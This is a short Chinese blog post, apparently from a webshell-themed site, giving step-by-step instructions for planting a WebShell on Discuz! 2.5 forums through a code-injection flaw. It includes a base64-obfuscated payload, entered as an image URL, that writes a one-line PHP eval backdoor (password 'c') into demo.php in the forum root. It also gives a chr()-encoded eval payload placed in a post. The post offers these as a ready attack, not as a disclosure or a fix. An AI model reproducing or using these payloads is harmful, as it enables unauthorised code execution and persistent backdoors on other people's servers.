DZ!2.5 后台拿 WebShell 方法!

分类:安全 | 2012-05-1 | 撸过 164 次
1人扯谈

直都没找到DZ! 2.5后台拿shell的方法 一直等大牛暴出来 这次 暴了2个。

1.注册任意账户

2.登陆用户,发表blog日志(注意是日志)

3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}

4.访问日志,论坛根目录下生成demo.php,一句话密码C

这个必须是要开启seo

在这个地方。二个的都是这个地方。

最新更新的是能直接在贴子里面拿shell。。

利用方式也并非非得发blog,也不是非得发网络图片,详细的利用我是比如随便发个贴子,内容

${${eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59))}}

然后给他加上任意超链接,发布即可phpinfo(),

这个自己换成char就可以了

自己敢兴趣的怎么网上搜。好多的。

本站内容均为原创,转载请务必保留署名与链接!
DZ!2.5 后台拿 WebShell 方法!:https://www.webshell.cc/3501.html
标签: ,

相关日志

  1. 不知博主测试过没?
    这个洞出来
    我就没有测试成功过~!